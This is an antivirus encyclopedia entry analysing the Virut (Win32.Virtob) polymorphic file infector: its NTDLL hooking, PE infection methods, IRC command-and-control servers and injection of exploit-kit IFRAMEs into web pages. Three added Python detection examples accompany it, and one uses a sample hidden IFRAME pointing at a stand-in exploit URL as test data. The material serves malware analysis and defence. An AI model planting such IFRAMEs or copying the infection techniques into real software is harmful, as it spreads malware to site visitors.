
Win32.Virtob.{2,3,4}.Gen

MEDIUM
MEDIUM
Size: 7 - 10 KB
Also known as: Generic.Virtob.1, Win32.Virut, W32/Virut, Virus.Win32.Virut, Virus:Win32/Virut, W32.Virut, W32/Vetor

Symptoms


  • Executable files grow by 7-10 KB, depending on the variant; some variants infect the same file more than once, so the increase can be a multiple of that.
  • DNS queries for IRC server names, followed by continuous TCP connection attempts to those servers on destination port 65520 or 80.

Removal instructions:


Please let BitDefender disinfect your files.

Note that some Virtob variants contain bugs, so a file that was infected incorrectly (corrupted by a broken infection routine) may not be recoverable by disinfection.

Analyzed By

Raul TOSA, BitDefender virus researcher

Technical Description:


This virus is a polymorphic, memory-resident file-infector, with backdoor behaviour.

The author spreads it by posting it on several forums as a crack for various applications and games. He also runs a "pay-per-install" affiliate program hosted at exerevenue.com, where the executable that users are told to run to earn money is the virus itself.

Once executed, it injects itself into winlogon.exe, creates a new thread in that process, and then passes execution back to the host file so that the infected program appears to run normally.

It also hooks the following functions, in the NTDLL module of each running process:
  • NtCreateFile
  • NtOpenFile
  • NtCreateProcess
  • NtCreateProcessEx
Every time a hooked process calls one of these functions, execution passes to the virus, which infects the file being accessed and then returns control to the original function. This is also why files cleaned on a running, infected system are re-infected as soon as they are opened again: the copy resident in memory has to be stopped first.
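As an added example (not code from this write-up or from Bitdefender), the following Python shows how a scanner detects inline hooks of this kind: it compares the first bytes of each hooked export as mapped in a process against the clean on-disk copy, decodes the two common prologue patches (jmp rel32 and push/ret), and flags any hook whose target lies outside ntdll's own image. The ntdll base address, export addresses, syscall numbers, stub layout and the address of the injected virus body are all constructed, illustrative values; they are not taken from a real system.

```python
import struct

# Exports the write-up says Virut hooks in every running process.
HOOKED_EXPORTS = ("NtCreateFile", "NtOpenFile", "NtCreateProcess", "NtCreateProcessEx")

def clean_stub(syscall_no, stack_bytes):
    """Constructed 32-bit Nt* stub, modelled on the XP-era shape
    mov eax, N ; mov edx, 7FFE0300h ; call [edx] ; ret n  (illustrative, not a real ntdll copy)."""
    return (b"\xb8" + struct.pack("<I", syscall_no)
            + b"\xba\x00\x03\xfe\x7f"
            + b"\xff\x12"
            + b"\xc2" + struct.pack("<H", stack_bytes))

def jmp_hook(func_va, target_va):
    """5-byte 'jmp rel32' that an inline hook writes over the function prologue."""
    return b"\xe9" + struct.pack("<I", (target_va - (func_va + 5)) & 0xFFFFFFFF)

def push_ret_hook(target_va):
    """6-byte 'push imm32 ; ret' trampoline, another common prologue patch."""
    return b"\x68" + struct.pack("<I", target_va) + b"\xc3"

def classify_prologue(mem, disk, func_va):
    """Compare a function's first bytes as mapped in a process with the clean on-disk copy.
    Returns None when intact, otherwise (kind, resolved target VA or None)."""
    n = min(len(mem), len(disk), 8)
    if mem[:n] == disk[:n]:
        return None
    if mem[0] == 0xE9 and len(mem) >= 5:
        rel = struct.unpack_from("<i", mem, 1)[0]
        return ("jmp_rel32", (func_va + 5 + rel) & 0xFFFFFFFF)
    if mem[0] == 0x68 and len(mem) >= 6 and mem[5] == 0xC3:
        return ("push_ret", struct.unpack_from("<I", mem, 1)[0])
    return ("modified", None)

def scan_ntdll(exports, mem_view, disk_view, ntdll_base, ntdll_size):
    """exports: {name: VA}; mem_view/disk_view: {name: leading bytes in memory / on disk}.
    Returns {name: (kind, target, target_inside_ntdll)} for each tampered export. A hook
    whose target lies outside ntdll's own image is the strong signal."""
    findings = {}
    for name in HOOKED_EXPORTS:
        res = classify_prologue(mem_view[name], disk_view[name], exports[name])
        if res is None:
            continue
        kind, target = res
        inside = target is not None and ntdll_base <= target < ntdll_base + ntdll_size
        findings[name] = (kind, target, inside)
    return findings

# --- constructed sample process state (illustrative addresses, not a real dump) ---
NTDLL_BASE, NTDLL_SIZE = 0x7C900000, 0x000B2000
EXPORTS = {"NtCreateFile": 0x7C90D090, "NtOpenFile": 0x7C90DCF0,
           "NtCreateProcess": 0x7C90D0D0, "NtCreateProcessEx": 0x7C90D0E0}
SYSCALLS = {"NtCreateFile": (0x25, 0x2C), "NtOpenFile": (0x74, 0x18),
            "NtCreateProcess": (0x2F, 0x20), "NtCreateProcessEx": (0x30, 0x24)}
DISK = {name: clean_stub(*SYSCALLS[name]) for name in EXPORTS}
VIRUS_BODY = 0x00D30000          # hypothetical address of the injected virus code
MEM = dict(DISK)                 # two of the four exports patched, as a hooked process would show
MEM["NtCreateFile"] = jmp_hook(EXPORTS["NtCreateFile"], VIRUS_BODY + 0x40) + DISK["NtCreateFile"][5:]
MEM["NtOpenFile"] = push_ret_hook(VIRUS_BODY + 0x80) + DISK["NtOpenFile"][6:]

def demo():
    return scan_ntdll(EXPORTS, MEM, DISK, NTDLL_BASE, NTDLL_SIZE)

if __name__ == "__main__":
    for name, (kind, target, inside) in demo().items():
        print("%-18s %-9s -> 0x%08X  inside ntdll: %s" % (name, kind, target, inside))
```

On a live system the "memory" side would come from reading the target process, and the "disk" side from mapping the same ntdll.dll file and applying relocations; the comparison logic is the same. A hook that jumps into a region that is not backed by any loaded module (here the injected virus body) is what distinguishes this kind of infection from legitimate hooking by security products.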

It infects EXE and SCR files, using several infection techniques:
  • Appending to the last section of the victim and setting the entry point directly to the viral code.
  • Entry Point Obscuring (EPO): it searches the code section for a call through the import address table (IAT) and patches it into a call to its polymorphic decryptor.
  • Overwriting some bytes at the entry point with its decryptor.
  • Inserting the decryptor into the slack space of the code section, if there is enough room for it.
Later versions (those detected as Win32.Virtob.6.Gen) use only the first method.
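The first technique (the only one later variants use) leaves a recognisable shape in the PE headers: the entry point points into the last section, that section has been grown by roughly the size of the virus body, and it has to be executable (and is usually still writable, since it was originally a data section). The Python below, an added example rather than anything from this write-up, parses the PE section table and reports those indicators. The two sample files are constructed in code by a minimal PE builder; they are not real binaries, and the section sizes and entry points are illustrative.

```python
import struct

IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"      # IMAGE_SECTION_HEADER, 40 bytes

def parse_pe(data):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE32/PE32+ file image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # same offset in PE32 and PE32+
    sections, off = [], opt + opt_size
    for _ in range(nsect):
        f = struct.unpack_from(SECTION_HDR, data, off)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": f[1], "va": f[2], "rsize": f[3], "rptr": f[4], "chars": f[9]})
        off += 40
    return entry, sections

def appended_infection_indicators(data, body_limit=10 * 1024):
    """Heuristics for 'append to the last section and point the entry point at it'.
    Returns a list of human-readable reasons; an empty list means nothing suspicious."""
    entry, secs = parse_pe(data)
    last = secs[-1]
    reasons = []
    ep_sec = next((s for s in secs
                   if s["va"] <= entry < s["va"] + max(s["vsize"], s["rsize"])), None)
    if ep_sec is None:
        return ["entry point 0x%X lies outside every section" % entry]
    if ep_sec is last and len(secs) > 1:
        reasons.append("entry point is in the last section (%s)" % last["name"])
        tail = last["va"] + max(last["vsize"], last["rsize"]) - entry
        if tail <= body_limit:                      # body_limit matches the 7-10 KB symptom
            reasons.append("only %d bytes between entry point and end of image" % tail)
    if ep_sec["chars"] & IMAGE_SCN_MEM_WRITE:
        reasons.append("entry point section %s is writable" % ep_sec["name"])
    if not ep_sec["chars"] & IMAGE_SCN_MEM_EXECUTE:
        reasons.append("entry point section %s is not marked executable" % ep_sec["name"])
    return reasons

def build_pe(sections, entry):
    """Construct a minimal PE32 image (constructed test data: headers plus zero-filled
    section bodies). sections: list of (name, rva, size, characteristics)."""
    hdr_len = 0x40 + 4 + 20 + 224 + 40 * len(sections)
    raw_ptr = (hdr_len + 0x1FF) & ~0x1FF          # first raw section at FileAlignment 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)         # PE32 magic
    struct.pack_into("<I", opt, 16, entry)        # AddressOfEntryPoint
    headers, body = b"", b""
    for name, rva, size, chars in sections:
        headers += struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"),
                               size, rva, size, raw_ptr, 0, 0, 0, 0, chars)
        body += bytes(size)
        raw_ptr += size
    image = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers).ljust(
        (hdr_len + 0x1FF) & ~0x1FF, b"\0")
    return image + body

TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Clean host: entry point near the start of .text.
CLEAN = build_pe([(".text", 0x1000, 0x400, TEXT), (".data", 0x2000, 0x200, DATA)], 0x1010)
# "Infected" host: .data grown by 0x2400 bytes, made executable, entry point moved into the tail.
INFECTED = build_pe([(".text", 0x1000, 0x400, TEXT),
                     (".data", 0x2000, 0x2600, DATA | IMAGE_SCN_MEM_EXECUTE)], 0x2210)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("infected", INFECTED)):
        print(label, len(img), "bytes:", appended_infection_indicators(img) or "no indicators")
```

These checks only cover the appending technique. The EPO, entry-point-overwrite and slack-space variants leave the entry point in the original code section and change no section sizes, so they need content-based detection (signature or emulation of the polymorphic decryptor) rather than header heuristics, which is why the write-up recommends letting the scanner handle disinfection.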

The virus detects emulators and virtual machines and avoids running under them.

To ensure that only one instance runs on the system, it creates an event with one of the following names:
  • VT_3
  • VT_4
  • VevT
  • Vx_4

It avoids infecting files that contain the following strings:
  • WINC
  • WCUN
  • WC32
  • PSTO

It tries to connect to one of the following IRC servers and join a specific channel there:
  • proxim.ircgalaxy.pl
  • proxima.ircgalaxy.pl
  • proxim.ntkrnlpa.info
  • ircd.zief.pl

Once it joins the channel, it waits for commands instructing it to download files from the Internet and execute them.

One of these files is a second component of the virus (detected as Win32.Virtob.Dld.?). It downloads further files (other downloaders) and infects HTM, PHP and ASP files on all fixed and removable drives and on network shares, by inserting an IFRAME right before the BODY tag.

The IFRAME loads a page served by MPack, an exploit kit that in this case carries exploits for:
  • MS06-014
  • MS06-006
  • MS06-044
  • MS06-071
  • MS06-057
  • WinZip ActiveX overflow
  • QuickTime overflow
  • MS07-017
These are used to download and execute a remote executable file (the latest version of the virus) on the machine that renders the page.

Because the ASP, HTM and PHP scripts on every infected machine are modified, scripts that serve web pages can be infected too, which greatly widens the spread (the virus is effectively behaving like a worm).
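An IFRAME placed before the BODY tag is invalid HTML that no authoring tool emits, so the exact placement the downloader uses is itself a reliable marker. The Python below, added here as an example and not part of this write-up, scans a set of HTM/PHP/ASP files for that marker, reports the IFRAME source (the exploit-kit landing page), and removes the injected tag. The file paths, page contents and URLs are constructed sample data (example.invalid is a reserved, non-resolving domain); the pattern and extension list follow the description above.

```python
import re

TARGET_EXTENSIONS = ("htm", "html", "php", "asp")

# An <iframe ...>...</iframe> (or a bare open tag) with nothing but whitespace between it
# and the <body> tag, i.e. the exact placement the downloader component uses.
INJECTED_IFRAME = re.compile(
    r"(<iframe\b[^>]*>\s*(?:</iframe>)?\s*)(?=<body\b)", re.IGNORECASE)

SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

def find_injected_iframes(text):
    """Return [(src_url_or_None, raw_tag)] for every iframe sitting directly before <body>."""
    hits = []
    for m in INJECTED_IFRAME.finditer(text):
        tag = m.group(1).strip()
        src = SRC_ATTR.search(tag)
        hits.append((src.group(1) if src else None, tag))
    return hits

def disinfect(text):
    """Strip the injected iframe(s) and leave the rest of the page untouched."""
    return INJECTED_IFRAME.sub("", text)

def scan_tree(files):
    """files: {path: content}. Only the extensions the downloader rewrites are examined.
    Returns {path: hits} for the files that carry the marker."""
    report = {}
    for path, content in files.items():
        ext = path.lower().rsplit(".", 1)[-1]
        if ext not in TARGET_EXTENSIONS:
            continue
        hits = find_injected_iframes(content)
        if hits:
            report[path] = hits
    return report

# Constructed sample tree (hypothetical paths, page contents and URLs).
SAMPLES = {
    "C:/inetpub/wwwroot/index.htm":
        '<html><head><title>Home</title></head>\n'
        '<iframe src="http://example.invalid/mpack/index.php" width="1" height="1" '
        'style="visibility:hidden"></iframe><body>\n<p>Hello</p></body></html>',
    # iframe inside the body: legitimate embedding, not the injection pattern
    "C:/inetpub/wwwroot/login.php":
        '<?php session_start(); ?>\n<html><body>'
        '<iframe src="http://example.invalid/embedded"></iframe></body></html>',
    # wrong extension: the downloader does not touch it, so neither does the scan
    "C:/inetpub/wwwroot/notes.txt":
        '<iframe src="http://example.invalid/x"></iframe><body>',
}

def demo():
    return scan_tree(SAMPLES)

if __name__ == "__main__":
    for path, hits in demo().items():
        for src, tag in hits:
            print("%s: iframe -> %s" % (path, src))
```

The reported src values double as network indicators: they are the hosts the exploit kit is served from, and blocking them at the proxy protects visitors of an infected site until the pages are cleaned. Cleaning the pages is only worthwhile once the downloader component and the resident virus have been removed from the machine, otherwise the files are rewritten again.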

Some versions contain a fragment of a poem by Friedrich Nietzsche. Usually it is:

O noon of life! O time to celebrate!
O summer garden!
Relentlessly happy and expectant, standing: -
Watching all day and night, for friends I wait:
Where are you, friends? Come! It is time! It's late!


or:

The glacier's gray adorned itself for you
Today with roses;
The brook seeks you, and full of longing rises
The wind, the cloud, into the vaulting blue
To look for you from dizzy bird's-eye view.


Some versions may be detected by BitDefender under names such as:

  • Generic.Virtob.1.????????
  • DeepScan:Generic.Virtob.1.????????
  • Win32.Virtob.??


Note: many versions contain bugs, so not all of the behaviour described above works as expected.